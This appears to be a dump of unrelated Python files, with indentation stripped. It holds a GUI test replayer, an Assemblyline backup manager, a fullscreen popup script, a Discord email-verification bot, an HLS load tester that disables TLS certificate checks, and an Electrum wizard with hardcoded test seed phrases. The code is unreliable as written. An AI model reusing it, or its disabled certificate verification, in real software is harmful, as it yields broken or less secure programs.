def getDocName(self, className):
return className.replace(".", "/")
def getRecordReplayInfo(self, module):
from simulator import WidgetMonitor
info = {}
for widgetClass, eventTypes in WidgetMonitor.getWidgetEventTypeNames():
className = self.getClassName(widgetClass, module)
info[className] = sorted(eventTypes)
return info
def getClassName(self, widgetClass, *args):
return widgetClass.__module__ + "." + widgetClass.__name__
def getClassNameColumnSize(self):
return 40 # seems to work, mostly
def getSupportedLogWidgets(self):
from describer import Describer
return Describer.statelessWidgets + Describer.stateWidgets
class UseCaseReplayer(storytext.guishared.ThreadedUseCaseReplayer):
def __init__(self, *args, **kw):
# Set up used for recording
storytext.guishared.ThreadedUseCaseReplayer.__init__(self, *args, **kw)
self.setThreadCallbacks()
def setThreadCallbacks(self):
if self.isActive():
self.uiMap.scriptEngine.setTestThreadAction(self.runReplay)
else:
self.uiMap.scriptEngine.setTestThreadAction(self.setUpMonitoring)
def getMonitorClass(self):
return self.importClass("WidgetMonitor", [ "customwidgetevents", self.__class__.__module__ + ".simulator" ])
def setUpMonitoring(self):
from org.eclipse.swtbot.swt.finder.utils import SWTUtils
SWTUtils.waitForDisplayToAppear()
monitor = self.getMonitorClass()(self.uiMap)
if monitor.setUp():
return monitor
def runReplay(self):
monitor = self.setUpMonitoring()
if monitor is None:
return # fatal error in setup
monitor.removeMousePointerIfNeeded()
from simulator import runOnUIThread
# Can't make this a member, otherwise fail with classloader problems for RCP
# (replayer constructed before Eclipse classloader set)
describer = self.getDescriber()
runOnUIThread(describer.addFilters, monitor.getDisplay())
def describe():
runOnUIThread(describer.describeWithUpdates, monitor.getActiveShell)
self.describeAndRun(describe, monitor.handleReplayFailure)
def shouldReraise(self, e, clsName, modNames):
msg = str(e).strip()
allowedMessages = [ "No module named " + modName for modName in modNames ]
allowedMessages.append("cannot import name " + clsName)
return msg not in allowedMessages
def importClass(self, className, modules, extModName=""):
for module in modules:
try:
exec "from " + module + " import " + className + " as _className"
return _className #@UndefinedVariable
except ImportError, e:
if self.shouldReraise(e, className, [ module, extModName ]):
raise
def getDescriberPackage(self):
return self.__class__.__module__
def getDescriber(self):
canvasDescriberClasses = []
for modName, extModName in [ ("customwidgetevents", ""), ("draw2ddescriber", "draw2d"), ("nattabledescriber", "nebula") ]:
descClass = self.importClass("CanvasDescriber", [ modName ], extModName)
if descClass:
canvasDescriberClasses.append(descClass)
descClass = self.importClass("Describer", [ "customwidgetevents", self.getDescriberPackage() + ".describer" ])
return descClass(canvasDescriberClasses)
|
backupmanager.py
|
import json
import time
import os
import subprocess
import threading
import uuid
from assemblyline.al.common import forge, queue, remote_datatypes
from assemblyline.al.common.error_template import ERROR_MAP
TYPE_BACKUP = 0
TYPE_RESTORE = 1
DATABASE_NUM = 3
RETRY_PRINT_THRESHOLD = 1000
COUNT_INCREMENT = 1000
LOW_THRESHOLD = 10000
HIGH_THRESHOLD = 50000
class SystemBackup(object):
def __init__(self, backup_file_path):
self.backup_file_path = backup_file_path
self.ds = forge.get_datastore()
# Static maps
self.BUCKET_MAP = {
"blob": self.ds.blobs,
"node": self.ds.nodes,
"profile": self.ds.profiles,
"signature": self.ds.signatures,
"user": self.ds.users,
}
self.VALID_BUCKETS = sorted(self.BUCKET_MAP.keys())
def list_valid_buckets(self):
return self.VALID_BUCKETS
# noinspection PyProtectedMember
def backup(self, bucket_list=None):
if bucket_list is None:
bucket_list = self.VALID_BUCKETS
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "ERROR: '%s' is not a valid bucket.\n\nChoose one of the following:\n\t%s\n" \
% (bucket, "\n\t".join(self.VALID_BUCKETS))
return
with open(self.backup_file_path, "wb") as out_file:
print "Starting system backup... [%s bucket(s)]" % ", ".join(bucket_list)
output = {}
for bucket in bucket_list:
data = {k: self.ds._get_bucket_item(self.BUCKET_MAP[bucket], k)
for k in self.ds._stream_bucket_debug_keys(self.BUCKET_MAP[bucket])}
output[bucket] = data
print "\t[x] %s" % bucket.upper()
print "Saving backup to file %s..." % self.backup_file_path
out_file.write(json.dumps(output))
print "Backup completed!\n"
# noinspection PyProtectedMember
def restore(self, bucket_list=None):
print "Loading backup file %s ..." % self.backup_file_path
with open(self.backup_file_path, "rb") as bck_file:
restore = json.loads(bck_file.read())
if bucket_list is None:
bucket_list = self.VALID_BUCKETS
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "ERROR: '%s' is not a valid bucket.\n\nChoose one of the following:\n\t%s\n" \
% (bucket, "\n\t".join(self.VALID_BUCKETS))
return
print "Restoring data in buckets... [%s]" % ", ".join(bucket_list)
errors = []
for bucket in bucket_list:
if bucket not in restore:
print "\t[ ] %s" % bucket.upper()
errors.append(bucket)
else:
for k, v in restore[bucket].iteritems():
v = self.ds.sanitize(bucket, v, k)
self.ds._save_bucket_item(self.BUCKET_MAP[bucket], k, v)
print "\t[x] %s" % bucket.upper()
if len(errors) > 0:
print "Backup restore complete with missing data.\nThe following buckets don't have any data " \
"to restore:\n\t%s \n" % "\n\t".join(errors)
else:
print "Backup restore complete!\n"
class DistributedBackup(object):
def __init__(self, working_dir, worker_count=50, spawn_workers=True):
self.working_dir = working_dir
self.ds = forge.get_datastore()
self.plist = []
self.instance_id = str(uuid.uuid4())
self.follow_queue = queue.NamedQueue("r-follow_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.hash_queue = remote_datatypes.Hash("r-hash_%s" % self.instance_id, db=DATABASE_NUM)
self.backup_queue = queue.NamedQueue('r-backup_%s' % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.backup_done_queue = queue.NamedQueue("r-backup-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.restore_done_queue = queue.NamedQueue("r-restore-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.bucket_error = []
self.BUCKET_MAP = {
"alert": self.ds.alerts,
"blob": self.ds.blobs,
"emptyresult": self.ds.emptyresults,
"error": self.ds.errors,
"file": self.ds.files,
"filescore": self.ds.filescores,
"node": self.ds.nodes,
"profile": self.ds.profiles,
"result": self.ds.results,
"signature": self.ds.signatures,
"submission": self.ds.submissions,
"user": self.ds.users,
}
self.VALID_BUCKETS = sorted(self.BUCKET_MAP.keys())
self.worker_count = worker_count
self.spawn_workers = spawn_workers
self.current_type = None
def terminate(self):
self._cleanup_queues(self.current_type)
def _cleanup_queues(self, task_type):
if task_type == TYPE_BACKUP:
print "\nCleaning up backup queues for ID: %s..." % self.instance_id
self.backup_queue.delete()
for _ in xrange(100):
self.backup_queue.push({"is_done": True})
time.sleep(2)
self.backup_queue.delete()
self.backup_done_queue.delete()
else:
print "\nCleaning up restore queues for ID: %s..." % self.instance_id
self.restore_done_queue.delete()
self.follow_queue.delete()
self.hash_queue.delete()
def _done_thread(self, done_type):
# Init
map_count = {}
missing_map_count = {}
t_count = 0
e_count = 0
t0 = time.time()
t_last = t0
done_count = 0
# Initialise by type
if done_type == TYPE_BACKUP:
title = "Backup"
done_queue = self.backup_done_queue
else:
title = "Restore"
done_queue = self.restore_done_queue
while True:
msg = queue.select(done_queue, timeout=1)
if not msg:
continue
_, data = msg
if data.get("is_done", False):
done_count += 1
else:
if data.get('success', False):
t_count += 1
bucket_name = data['bucket_name']
if data.get("missing", False):
if bucket_name not in missing_map_count:
missing_map_count[bucket_name] = 0
missing_map_count[bucket_name] += 1
else:
if bucket_name not in map_count:
map_count[bucket_name] = 0
map_count[bucket_name] += 1
if t_count % COUNT_INCREMENT == 0:
new_t = time.time()
print "%s (%s at %s keys/sec) ==> %s" % (t_count,
new_t - t_last,
int(COUNT_INCREMENT / (new_t - t_last)),
map_count)
t_last = new_t
else:
e_count += 1
if done_count == self.worker_count:
break
# Cleanup
self.hash_queue.delete()
summary = ""
summary += "%s DONE! (%s keys backed up - %s errors - %s secs)\n" % \
(title, t_count, e_count, time.time() - t0)
summary += "\n############################################\n"
summary += "########## %08s SUMMARY ################\n" % title.upper()
summary += "############################################\n\n"
for k, v in map_count.iteritems():
summary += "\t%15s: %s\n" % (k.upper(), v)
if len(missing_map_count.keys()) > 0:
summary += "\n\nMissing data:\n\n"
for k, v in missing_map_count.iteritems():
summary += "\t%15s: %s\n" % (k.upper(), v)
if len(self.bucket_error) > 0:
summary += "\nThese buckets failed to %s completely: %s\n" % (title.lower(), self.bucket_error)
print summary
# noinspection PyProtectedMember
def _key_streamer(self, bucket_name, _):
for x in self.ds._stream_bucket_debug_keys(self.BUCKET_MAP[bucket_name]):
yield x
def _search_streamer(self, bucket_name, query):
for x in self.ds.stream_search(bucket_name, query, fl="_yz_rk", item_buffer_size=500):
yield x['_yz_rk']
# noinspection PyBroadException,PyProtectedMember
def backup(self, bucket_list, follow_keys=False, query=None):
if query:
stream_func = self._search_streamer
else:
stream_func = self._key_streamer
for bucket in bucket_list:
if bucket not in self.VALID_BUCKETS:
print "\n%s is not a valid bucket.\n\nThe list of valid buckets is the following:\n\n\t%s\n" % \
(bucket.upper(), "\n\t".join(self.VALID_BUCKETS))
return
try:
# Cleaning queues
self.current_type = TYPE_BACKUP
# Spawning workers
if self.spawn_workers:
print "Spawning %s backup workers ..." % self.worker_count
devnull = open(os.devnull, 'w')
for x in xrange(self.worker_count):
run_dir = __file__[:__file__.index("common/")]
p = subprocess.Popen([os.path.join(run_dir, "run", "invoke.sh"),
os.path.join(run_dir, "run", "distributed_worker.py"),
str(TYPE_BACKUP),
str(x),
self.working_dir,
self.instance_id],
stderr=devnull,
stdout=devnull)
self.plist.append(p)
print "All backup workers started!"
else:
print "No spawning any workers. You need to manually spawn %s workers..." % self.worker_count
# Start done thread
t = threading.Thread(target=self._done_thread, args=(TYPE_BACKUP,), name="Done thread")
t.setDaemon(True)
t.start()
# Process data buckets
print "Send all keys of buckets [%s] to be backed-up..." % ', '.join(bucket_list)
if follow_keys:
print "Distributed backup will perform a deep backup."
for bucket_name in bucket_list:
try:
count = 0
for key in stream_func(bucket_name, query):
self.backup_queue.push({"bucket_name": bucket_name, "key": key, "follow_keys": follow_keys})
count += 1
if count % COUNT_INCREMENT == 0:
if self.backup_queue.length() > HIGH_THRESHOLD:
retry = 0
while self.backup_queue.length() > LOW_THRESHOLD:
if retry % RETRY_PRINT_THRESHOLD == 0:
print "WARNING: Backup queue reached max threshold (%s). " \
"Waiting for queue size " \
"to reach %s before sending more keys... [%s]" \
% (HIGH_THRESHOLD, LOW_THRESHOLD, self.backup_queue.length())
time.sleep(0.1)
retry += 1
except Exception, e:
self.follow_queue.delete()
self.backup_queue.delete()
self.hash_queue.delete()
print e
print "Error occurred while processing bucket %s." % bucket_name
self.bucket_error.append(bucket_name)
# Push kill message to all workers
print "All keys sent for all buckets. Sending kill command and waiting for workers to finish..."
for _ in xrange(self.worker_count):
self.backup_queue.push({"is_done": True})
# Wait for workers to finish
t.join()
except Exception, e:
print e
finally:
print "Backup of %s terminated.\n" % ", ".join(bucket_list)
def restore(self):
try:
self.current_type = TYPE_RESTORE
# Spawning workers
print "Spawning %s restore workers ..." % self.worker_count
devnull = open(os.devnull, 'w')
for x in xrange(self.worker_count):
run_dir = __file__[:__file__.index("common/")]
p = subprocess.Popen([os.path.join(run_dir, "run", "invoke.sh"),
os.path.join(run_dir, "run", "distributed_worker.py"),
str(TYPE_RESTORE),
str(x),
self.working_dir,
self.instance_id],
stderr=devnull,
stdout=devnull)
self.plist.append(p)
print "All restore workers started, waiting for them to import all the data..."
# Start done thread
t = threading.Thread(target=self._done_thread, args=(TYPE_RESTORE,), name="Done thread")
t.setDaemon(True)
t.start()
# Wait for workers to finish
t.join()
except Exception, e:
print e
finally:
print "Restore of backup in %s terminated.\n" % self.working_dir
def _string_getter(data):
if data is not None:
return [data]
else:
return []
def _result_getter(data):
if data is not None:
return [x for x in data if not x.endswith('.e')]
else:
return []
def _emptyresult_getter(data):
if data is not None:
return [x for x in data if x.endswith('.e')]
else:
return []
def _error_getter(data):
if data is not None:
return [x for x in data if x.rsplit('.e', 1)[1] not in ERROR_MAP.keys()]
else:
return []
def _srl_getter(data):
if data is not None:
return [x[:64] for x in data]
else:
return []
def _file_getter(data):
if data is not None:
return [x[1] for x in data]
else:
return []
def _result_file_getter(data):
if data is not None:
supp = data.get("supplementary", []) + data.get("extracted", [])
return _file_getter(supp)
else:
return []
FOLLOW_KEYS = {
"alert": [
('submission', 'sid', _string_getter),
],
"submission": [
('result', 'results', _result_getter),
('emptyresult', 'results', _emptyresult_getter),
('error', 'errors', _error_getter),
('file', 'results', _srl_getter),
('file', 'files', _file_getter),
('file', 'errors', _srl_getter),
],
"results": [
('file', 'response', _result_file_getter),
]
}
# noinspection PyProtectedMember,PyBroadException
class BackupWorker(object):
def __init__(self, wid, worker_type, working_dir, instance_id):
self.working_dir = working_dir
self.worker_id = wid
self.ds = forge.get_datastore()
self.worker_type = worker_type
self.instance_id = instance_id
if worker_type == TYPE_BACKUP:
self.hash_queue = remote_datatypes.Hash("r-hash_%s" % self.instance_id, db=DATABASE_NUM)
self.follow_queue = queue.NamedQueue("r-follow_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.queue = queue.NamedQueue("r-backup_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
self.done_queue = queue.NamedQueue("r-backup-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
else:
self.hash_queue = None
self.follow_queue = None
self.queue = None
self.done_queue = queue.NamedQueue("r-restore-done_%s" % self.instance_id, db=DATABASE_NUM, ttl=1800)
def _backup(self):
done = False
current_queue = self.queue
with open(os.path.join(self.working_dir, "backup.part%s" % self.worker_id), "wb") as backup_file:
while True:
data = current_queue.pop(timeout=1)
if not data and done:
break
elif not data:
continue
if isinstance(data, list):
data = data[0]
if data.get('is_done', False) and not done:
current_queue = self.follow_queue
done = True
continue
elif data.get('is_done', False) and done:
# Go someone else done message. Push it back on the queue and sleep...
self.queue.push({"is_done": True})
time.sleep(1)
continue
missing = False
success = True
try:
to_write = self.ds._get_bucket_item(self.ds.get_bucket(data['bucket_name']), data['key'])
if to_write:
if data.get('follow_keys', False):
for bucket, bucket_key, getter in FOLLOW_KEYS.get(data['bucket_name'], []):
for key in getter(to_write.get(bucket_key, None)):
hash_key = "%s_%s" % (bucket, key)
if not self.hash_queue.exists(hash_key):
self.hash_queue.add(hash_key, "True")
self.follow_queue.push({"bucket_name": bucket, "key": key, "follow_keys": True})
backup_file.write(json.dumps((data['bucket_name'], data['key'], to_write)) + "\n")
else:
missing = True
except:
success = False
self.done_queue.push({"is_done": False,
"success": success,
"missing": missing,
"bucket_name": data['bucket_name'],
"key": data['key']})
# noinspection PyUnresolvedReferences
def _restore(self):
with open(os.path.join(self.working_dir, "backup.part%s" % self.worker_id), "rb") as input_file:
for l in input_file.xreadlines():
bucket_name, key, data = json.loads(l)
success = True
try:
v = self.ds.sanitize(bucket_name, data, key)
self.ds._save_bucket_item(self.ds.get_bucket(bucket_name), key, v)
except:
success = False
self.done_queue.push({"is_done": False,
"success": success,
"missing": False,
"bucket_name": bucket_name,
"key": key})
def run(self):
if self.worker_type == TYPE_BACKUP:
self._backup()
else:
self._restore()
self.done_queue.push({"is_done": True})
if __name__ == "__main__":
import sys
# noinspection PyBroadException
try:
backup = sys.argv[1]
backup_manager = DistributedBackup(backup, worker_count=1, spawn_workers=False)
backup_manager.restore()
except:
print "No backup to restore"
|
FlashCoucou.pyw
|
import sys
import time
import winsound
import threading
from tkinter import *
global fen
flash_path = sys.argv[1]
event = sys.argv[2]
fen = Tk()
def quitter():
global fen
fen.focus_set()
fen.focus_force()
fen.attributes("-topmost", True)
fen.attributes("-topmost", False)
winsound.PlaySound(flash_path + "Coucou.wav", winsound.SND_FILENAME)
fen.destroy()
fen.geometry("1920x1080")
fen.attributes("-fullscreen", True)
photo = PhotoImage(file= flash_path + event + ".png")
can = Canvas(fen, height= 1080, width= 1920)
can.create_image(1920 / 2, 1080 / 2, image= photo)
can.pack()
thread = threading.Thread(target= quitter)
thread.daemon = True
thread.start()
fen.mainloop()
|
bot.py
|
import logging
import threading
import asyncio
import unicodedata
from decouple import config
import discord
from discord.utils import get
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from .utils import send_verify_mail
intents = discord.Intents.all()
intents.presences = False
TOKEN = config("DISCORD_TOKEN", default="")
CSUA_GUILD_ID = config("TEST_GUILD", default=784902200102354985, cast=int)
CSUA_PHILBOT_CLIENT_ID = config("BOT_ID", default=737930184837300274, cast=int)
HOSER_ROLE_ID = config("TEST_ROLE", default=785418569412116513, cast=int) # Verified
DEBUG_CHANNEL_ID = config("DEBUG_CHANNEL", default=788989977794707456, cast=int)
TIMEOUT_SECS = 10
ANI_NRUSIMHA_ID = 168539105704017920
logger = logging.getLogger(__name__)
class CSUAClient(discord.Client):
async def on_ready(self):
print(f"{self.user} has connected to Discord")
self.is_phillip = self.user.id == CSUA_PHILBOT_CLIENT_ID
if self.is_phillip:
print("Phillip is in the Office")
self.csua_guild = get(self.guilds, id=CSUA_GUILD_ID)
self.test_channel = get(self.csua_guild.channels, id=DEBUG_CHANNEL_ID)
self.hoser_role = get(self.csua_guild.roles, id=HOSER_ROLE_ID)
# if self.csua_guild is not None and self.test_channel is not None and self.hoser_role is not None:
# await self.test_channel.send("booting up successfully into phillip_debug channel")
async def verify_member_email(self, user):
channel = user.dm_channel
def check_msg(msg):
return msg.channel == channel
got_email = False
while not got_email:
msg = await self.wait_for("message", check=check_msg)
try:
validate_email(msg.content)
if "@berkeley.edu" in msg.content:
got_email = True
await channel.send(
f"Sending a an email to verify {user.name} to {msg.content}"
)
send_verify_mail(msg.content, user.name)
else:
await channel.send(
f"{msg.content} is not a berkeley email. Please fix this"
)
except ValidationError as e:
await channel.send(
f"{msg.content} is not a valid email. Please try again. Details: ",
e,
)
async def on_message(self, message):
if message.author == self.user:
return
# Reading rules and verification
msg = message.content.lower()
if "hkn" in msg and "ieee" in msg:
await message.channel.send("Do I need to retrieve the stick?")
if "is typing" in msg:
await message.channel.send("unoriginal")
if msg.count("cpma") >= 2:
for c in "wtfiscpma":
emoji = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji)
elif "based" in msg:
for c in "based":
emoji = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji)
await message.add_reaction("😎")
if message.author.id == ANI_NRUSIMHA_ID:
emoji = get(self.emojis, name="AniChamp")
if emoji:
await message.add_reaction(emoji)
else:
for c in 'ANI':
emoji_letter = unicodedata.lookup(f"REGIONAL INDICATOR SYMBOL LETTER {c}")
await message.add_reaction(emoji_letter)
async def on_member_join(self, member):
msg = await member.send(
"Welcome to the CSUA discord server! First, read the rules in #landing-zone. Thumbs up this message if you agree"
)
await self.test_channel.send(f"Sent initial discord message to {member}")
def check_thumb(react, _):
return react.message == msg and str(react.emoji) == "👍" # thumbs
await self.wait_for("reaction_add", check=check_thumb)
await self.test_channel.send(f"{member} read rules")
await member.send(
"Verify your berkeley.edu email to gain access. First, pleast type your email. Please contact a moderator if you have any issues."
)
await self.test_channel.send(f"{member} was prompted for email")
await self.verify_member_email(member)
if self.is_phillip:
await self.test_channel.send(
f"{member} was sent registration email"
)
class CSUABot:
"""
Wraps CSUAClient by abstracting thread and event loop logic.
All the discord.Client coroutines must be called using
`asyncio.run_coroutine_threadsafe` because the client is running inside an
event loop in a separate thread. Event loops are one per-thread, and Django
can't handle async code, so a separate thread is used instead.
"""
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._start, daemon=True)
self.running=True
self.thread.start()
def _start(self):
asyncio.set_event_loop(self.loop)
self.client = CSUAClient(intents=intents)
try:
self.loop.run_until_complete(self.client.start(TOKEN))
finally:
self.loop.run_until_complete(self.client.logout())
self.loop.close()
def promote_user_to_hoser(self, tag):
if not hasattr(self.client, "csua_guild"):
client = self.client
print(client)
member = self.client.csua_guild.get_member_named(tag)
if member:
asyncio.run_coroutine_threadsafe(
member.add_roles(self.client.hoser_role), self.loop
).result(TIMEOUT_SECS)
asyncio.run_coroutine_threadsafe(
self.client.test_channel.send(f"verified {tag}"), self.loop
).result(TIMEOUT_SECS)
return True
return False
if TOKEN:
csua_bot = CSUABot()
else:
csua_bot = None
|
hls_runner.py
|
import json
import m3u8
from multiprocessing import Process, Manager, Lock
import pdb
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3.exceptions import InsecurePlatformWarning
import time
from urlparse import urlparse
def average_list(list_items, shift=1):
# Return average from list (normalised by shift to convert units)
try:
return float(sum(list_items))/float(len(list_items))/float(shift)
except ZeroDivisionError as e:
return None
def min_max_list(list_items, shift=1):
# Return list minimum and maximum (normalised by shift to convert units)
try:
return min(list_items)/float(shift), max(list_items)/float(shift)
except ValueError as e:
return None, None
def calculated_response_times(durations):
# Compile response times into Average, Min, and Max durations
return {
'Average': average_list(durations, 1000000),
'Min': min_max_list(durations, 1000000)[0],
'Max': min_max_list(durations, 1000000)[1]
}
def construct_url(playlist_url, segment):
# Segments point to absolute URL
if segment.startswith('http'):
return segment
# Segments point to relative URL, which need added path context
else:
if segment.startswith('./') and len(segment) > 2:
segment = segment[2:]
return playlist_url.rsplit('/', 1)[0] + ('/' + segment).replace('//', '/')
elif segment.startswith('/'):
return urlparse(playlist_url).scheme + '://' + (urlparse(playlist_url).netloc + segment).replace('//', '/')
else:
return playlist_url.rsplit('/', 1)[0] + '/' + segment
def get_playlist_details(m3u8_url, timeout, success):
# Get playlist and extract m3u8 data
try:
r = requests.get(m3u8_url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
if not r.status_code in [200, 201, 302, 307]:
try: success[False] += 1
except: success[False] = 1
return
else:
try:
playlist = m3u8.loads(r.text)
try: success[True] += 1
except: success[True] = 1
return playlist
except:
try: success[False] += 1
except: success[False] = 1
return
except:
try: success[False] += 1
except: success[False] = 1
def get_segment(url, status, results, duration, timeout, lock):
# Get HLS Segment and tally status codes and errors
try:
r = requests.get(url=url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
duration.append(r.elapsed.microseconds)
lock.acquire()
try: status[r.status_code] += 1
except: status[r.status_code] = 1
lock.release()
lock.acquire()
try: results['Valid Response'] += 1
except: results['Valid Response'] = 1
lock.release()
except requests.exceptions.ReadTimeout as e:
lock.acquire()
try: results['Read Timeout'] += 1
except: results['Read Timeout'] = 1
lock.release()
except requests.exceptions.ConnectTimeout as e:
lock.acquire()
try: results['Connect Timeout'] += 1
except: results['Connect Timeout'] = 1
lock.release()
except requests.exceptions.ConnectionError as e:
lock.acquire()
try: results['Connection Error'] += 1
except: results['Connection Error'] = 1
lock.release()
except Exception as e:
print "Unknown Error %s" % e
lock.acquire()
try: results['Unknown Error'] += 1
except: results['Unknown Error'] = 1
lock.release()
def authenticate(authentication_url, username, password, request_type):
# Get session cookies for URLs requiring authentication
if request_type.lower() == 'get':
auth_request = requests.get(authentication_url, auth=(username, password))
elif request_type.lower() == 'post':
payload = {'username': username, 'password': password}
auth_request = requests.post(authentication_url, data=payload)
return auth_request.cookies
def get_playlist(m3u8_url, live, loop, results, status, success, duration, playlists, timeout, cookies, lock, pid):
# Extract HLS segments from M3U8 file for VOD or Live content
playlist = get_playlist_details(m3u8_url, timeout, success)
base_url = m3u8_url
if playlist:
loop_iterator, loop_limit = 1, 1000
seconds_since_new_file = 0
no_file_timeout = 120
segments = {}
segments['count'] = 0
segments['played'] = {}
# For live content
if live.lower() == 'true':
# If playlist contains nested playlists, use the first
if len(playlist.playlists) > 0:
base_url = construct_url(m3u8_url, playlist.playlists[0].uri)
while segments['count'] < int(loop):
# In case no files are found, break loop after 1000 iterations
loop_iterator += 1
if loop_iterator >= loop_limit:
return
# If playlists are continually requested with the same list of segments, timeout after no_file_timeout
if seconds_since_new_file > no_file_timeout:
return
playlist = get_playlist_details(base_url, timeout, success)
if not playlist:
continue
for idx, file in enumerate(playlist.files):
# Break when enough segments (user set) have been requested
if segments['count'] >= int(loop):
return
# Only request segments from [n - 3, n]
if idx < (len(playlist.files) - 3):
continue
segment_url = construct_url(base_url, file)
# If segement has not yet been requested (some playlists will overlap TS files if files if requested too fast)
if not segments['played'].has_key(segment_url):
seconds_since_new_file = 0
lock.acquire()
segments['count'] += 1
lock.release()
segments['played'][segment_url] = True
time.sleep(timeout['sleep'])
get_segment(segment_url, status, results, duration, timeout, lock)
# Sleep before getting next playlists (in case there are no new segments, this loops too quickly)
time.sleep(timeout['sleep'])
seconds_since_new_file += int(timeout['sleep'])
else: # VOD
for loop_number in range(0, int(loop)):
# If playlist contains all TS files directly
if len(playlist.files) > 0:
for idx, file in enumerate(playlist.files):
time.sleep(timeout['sleep'])
segment_url = construct_url(base_url, file)
get_segment(segment_url, status, results, duration, timeout, lock)
# If playlist contains nested playlists
else:
for sub_playlist in playlist.playlists:
sub_playlist_url = construct_url(base_url, sub_playlist.uri)
nested_playlist = requests.get(url=sub_playlist_url, verify=False, allow_redirects=True, timeout=(timeout['connect'], timeout['read']))
for idx, file in enumerate(m3u8.loads(nested_playlist.text).files):
time.sleep(timeout['sleep'])
segment_url = construct_url(nested_playlist.url, file)
get_segment(segment_url, status, results, duration, timeout, lock)
def get_hls_stream(m3u8_url, concurrency=1, live=True, loop=1, segment_sleep=1, authentication=None, timeouts=None):
# Spawn concurrent subprocesses to get every HLS segment of stream
# Disable all SSL Warnings (version dependent)
try:
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
except:
pass
# Configurables
subprocesses = []
process_id = 0
timeout = {'read': float(timeouts['read']),
'connect': float(timeouts['connect']),
'sleep': float(segment_sleep)}
manager = Manager()
lock = manager.Lock()
durations = manager.list()
success = manager.dict()
results = manager.dict()
status = manager.dict()
playlists = manager.dict()
# Cookies for session authentication
if authentication:
cookies = (authentication['url'], authentication['username'], authentication['password'], authentication['type'])
else:
cookies = None
# Spawn parallel subprocesses for each simulated client
for x in range(0, int(concurrency)):
process_id += 1
p = Process(target=get_playlist, args=(m3u8_url, live, loop, results, status, success, durations, playlists, timeout, cookies, lock, process_id,))
subprocesses.append(p)
p.start()
# Wait for all processes to complete
for subprocess in subprocesses:
while True:
response_times = calculated_response_times(durations)
yield results._getvalue(), status._getvalue(), response_times, success._getvalue()
time.sleep(1)
if not subprocess.is_alive():
yield results._getvalue(), status._getvalue(), response_times, success._getvalue()
break
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
